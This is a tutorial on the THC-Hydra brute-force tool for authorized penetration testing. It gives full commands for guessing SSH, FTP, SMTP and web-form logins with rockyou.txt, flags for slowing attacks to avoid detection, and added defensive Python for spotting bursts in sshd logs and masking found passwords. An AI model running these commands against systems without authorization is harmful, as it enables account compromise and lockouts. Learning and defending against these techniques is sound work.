THC-Hydra is one of the most widely used network login brute-force tools in penetration testing. It supports over 50 protocols — from SSH and FTP to HTTP forms and SMTP — making it a versatile weapon in an authorized attacker’s toolkit. This guide covers installation, core syntax, protocol-specific usage, and responsible practices.
Legal notice: Only use Hydra against systems you own or have explicit written authorization to test. Unauthorized brute-forcing is a criminal offense in most jurisdictions.
Installing Hydra
Hydra comes pre-installed on Kali Linux. For other systems:
# Debian/Ubuntu
sudo apt install hydra
# From source
git clone https://github.com/vanhauser-thc/thc-hydra
cd thc-hydra
./configure && make && make install
Verify installation:
hydra -h
Core Syntax
The basic structure of every Hydra command:
hydra [options] target protocol
The most important options:
| Flag | Purpose |
|---|---|
| -l | Single username |
| -L | Username list file |
| -p | Single password |
| -P | Password list file |
| -t | Threads per target (default: 16) |
| -W | Wait time between attempts (seconds) |
| -s | Non-default port |
| -v | Verbose mode |
| -V | Very verbose (show each attempt) |
| -o | Output results to file |
| -f | Stop after first valid credential found |
Wordlists: rockyou.txt and Beyond
The legendary rockyou.txt wordlist — derived from a 2009 breach of 32 million RockYou passwords — is the default starting point for most password attacks:
# Location on Kali (may need to decompress first)
gunzip /usr/share/wordlists/rockyou.txt.gz
For targeted attacks, use SecLists:
sudo apt install seclists
ls /usr/share/seclists/Passwords/
Notable SecLists password files:
- Common-Credentials/top-passwords-shortlist.txt — Quick wins
- Leaked-Databases/rockyou.txt — Classic full list
- Default-Credentials/default-passwords.csv — Default creds for devices
SSH Brute-Forcing
SSH is a common target on internal networks and CTF boxes:
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
With a username list:
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
-P /usr/share/wordlists/rockyou.txt \
ssh://192.168.1.100 \
-t 4 -f -o ssh_results.txt
Important: Keep -t low for SSH (4–6 threads). SSH has built-in throttling and high thread counts cause connection failures. Some servers enforce fail2ban after 3–5 failed attempts — be aware of this in real engagements.
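The throttling and fail2ban behaviour described above is the defender's side of this section, so here is an added example (not part of the original guide) that applies the same counting a fail2ban-style jail does: it reads sshd syslog lines, flags any source IP with a burst of failed logins inside a sliding window, and marks the case that matters most, a successful login right after a burst. The log lines are constructed, the syslog format is assumed to be the classic OpenSSH one, and the year is assumed because syslog timestamps carry none.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Syslog sshd lines carry no year, so one is assumed when parsing timestamps.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)

def detect_bursts(lines, threshold=5, window_s=60, year=2024):
    """Return {ip: {"failures", "users", "success_after_burst"}} for every source
    IP with >= threshold failed logins inside any window_s-second window, the
    same counting a fail2ban-style jail performs before it bans the source."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still in window
    seen = defaultdict(set)       # ip -> usernames tried from that ip
    flagged = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue              # other sshd messages are not login results
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, user = m["ip"], m["user"]
        seen[ip].add(user)
        if m["result"] == "Failed":
            q = recent[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()       # expire failures older than the window
            if len(q) >= threshold:
                entry = flagged.setdefault(ip, {"success_after_burst": False})
                entry.update(failures=len(q), users=seen[ip])
        elif ip in flagged:
            # A successful login right after a burst is the case to escalate.
            flagged[ip]["success_after_burst"] = True
    return flagged

# Constructed sample: five quick failures from 10.0.0.5 followed by a hit,
# plus an unrelated single failure from 10.0.0.9 and a non-login message.
SAMPLE_LOG = """\
Jan 10 12:00:01 bastion sshd[2201]: Failed password for admin from 10.0.0.5 port 50111 ssh2
Jan 10 12:00:03 bastion sshd[2203]: Failed password for invalid user root from 10.0.0.5 port 50112 ssh2
Jan 10 12:00:05 bastion sshd[2205]: Failed password for admin from 10.0.0.5 port 50113 ssh2
Jan 10 12:00:07 bastion sshd[2207]: Failed password for admin from 10.0.0.5 port 50114 ssh2
Jan 10 12:00:09 bastion sshd[2209]: Failed password for admin from 10.0.0.5 port 50115 ssh2
Jan 10 12:00:11 bastion sshd[2211]: Connection closed by 10.0.0.9 port 40000 [preauth]
Jan 10 12:00:12 bastion sshd[2213]: Failed password for admin from 10.0.0.9 port 40001 ssh2
Jan 10 12:00:13 bastion sshd[2215]: Accepted password for admin from 10.0.0.5 port 50116 ssh2
""".splitlines()
```

Running `detect_bursts(SAMPLE_LOG)` flags only 10.0.0.5, with both usernames tried and success_after_burst set; raising the threshold to 6 flags nothing, which is exactly the margin a slow, low -t run is trying to stay under.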
HTTP Form Brute-Forcing
Web login forms are among the most common targets. Hydra needs three pieces of information:
- The form POST URL
- The POST body parameters
- A string that appears only on failed login
Use Burp Suite or browser developer tools (Network tab) to capture a failed login. You’ll see something like:
POST /login HTTP/1.1
Host: target.com
username=admin&password=wrong&submit=Login
Hydra HTTP-POST-FORM Syntax
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
target.com \
http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:Invalid credentials"
The format for the module is: "/path:POST_body:failure_string"
- ^USER^ — Hydra replaces this with each username
- ^PASS^ — Hydra replaces this with each password
- The final segment is a string that appears in the response on failure
For HTTPS targets:
hydra -l admin -P rockyou.txt \
target.com \
https-post-form "/login:username=^USER^&password=^PASS^:Invalid"
Handling CSRF Tokens
Many modern apps use CSRF tokens. Hydra cannot automatically handle rotating CSRF tokens — for those, use Burp Suite’s Intruder with a macro to fetch a fresh token per request.
FTP Brute-Forcing
hydra -l ftp -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.100
With a custom port:
hydra -l admin -P rockyou.txt ftp://192.168.1.100 -s 2121
SMTP Brute-Forcing
Email server credential attacks:
hydra -l user@target.com -P rockyou.txt smtp://mail.target.com
For SMTP with STARTTLS:
hydra -l user@target.com -P rockyou.txt smtp-starttls://mail.target.com
Rate Limiting and Stealth Flags
High-speed brute-forcing triggers alarms and lockouts. Key flags for controlled attacks:
-t — Threads per target. Reducing this slows the attack:
hydra -l admin -P rockyou.txt ssh://target.com -t 2
-W — Wait time in seconds between each connection attempt:
hydra -l admin -P rockyou.txt ssh://target.com -W 3
-c — Time to wait per login attempt in seconds (overrides -W):
hydra -l admin -P rockyou.txt ssh://target.com -c 5
-f — Exit after the first found credential pair. Essential for efficiency:
hydra -L users.txt -P rockyou.txt ssh://target.com -f -o found.txt
Multiple Targets
Attack a list of targets simultaneously:
hydra -L users.txt -P rockyou.txt -M targets.txt ssh
The targets.txt file contains one IP or hostname per line.
Interpreting Output
A successful find looks like:
[22][ssh] host: 192.168.1.100 login: admin password: password123
Save results with -o:
hydra -l admin -P rockyou.txt ssh://192.168.1.100 -o hydra_output.txt
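To turn the output above into something that can go into a report without copying cleartext passwords around, here is an added example (not part of the original guide) that parses Hydra hit lines into structured findings per host and replaces each password with its length and character classes. The sample lines are constructed; the "# Hydra ..." header that -o writes is assumed to start with "#" and is skipped, as is the summary line Hydra prints at the end of a run.

```python
import re
from collections import defaultdict

# One line per valid credential pair, as Hydra prints it and writes it with -o.
HIT_RE = re.compile(
    r"^\[(?P<port>\d+)\]\[(?P<service>[\w-]+)\]\s+host:\s+(?P<host>\S+)"
    r"\s+login:\s+(?P<login>\S+)\s+password:\s+(?P<password>.*)$"
)

def mask(secret: str) -> str:
    """Keep only the length and character classes, enough to describe how weak
    the password was without putting the cleartext into the report."""
    classes = "".join(c for c, f in (("a", str.islower), ("A", str.isupper),
                                     ("0", str.isdigit)) if any(f(ch) for ch in secret))
    if any(not ch.isalnum() for ch in secret):
        classes += "!"
    return f"<{len(secret)} chars, classes {classes or 'none'}>"

def parse_hydra_output(lines):
    """Return {host: [finding, ...]} with every password replaced by mask()."""
    findings = defaultdict(list)
    for line in lines:
        line = line.rstrip("\n")
        if not line or line.startswith("#"):
            continue                       # -o files start with a "# Hydra ..." header
        m = HIT_RE.match(line)
        if not m:
            continue                       # progress and summary lines are not hits
        findings[m["host"]].append({
            "service": m["service"], "port": int(m["port"]),
            "login": m["login"], "password": mask(m["password"]),
        })
    return dict(findings)

# Constructed sample: header comment, three hits across two hosts, summary line.
SAMPLE_OUTPUT = """\
# Hydra vX.Y run at 2024-01-10 12:00:00 on 192.168.1.100 ssh (constructed header)
[22][ssh] host: 192.168.1.100   login: admin   password: password123
[22][ssh] host: 192.168.1.100   login: backup   password: Backup2024!
[21][ftp] host: 192.168.1.101   login: ftp   password: ftp
1 of 1 target successfully completed, 3 valid passwords found
""".splitlines()
```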
Responsible Use Guidelines
Hydra is a powerful tool that can cause real damage if misused:
- Always have written authorization before testing any system you don’t own
- Account lockout: Many systems lock accounts after 3–5 failed attempts, potentially causing denial-of-service for legitimate users. Check the engagement scope for lockout policies
- Rate limit deliberately: Slow attacks are less disruptive and less likely to trigger defenses
- Log your activity: Keep timestamps and notes of what you tested and when
- Report responsibly: If you find valid credentials, report them through proper channels immediately
Hydra is most effective against weak password policies and default credentials. In practice, combining it with a user enumeration step (finding valid usernames first) dramatically improves success rates. Pair Hydra with Medusa or Ncrack for cross-validation when thoroughness matters.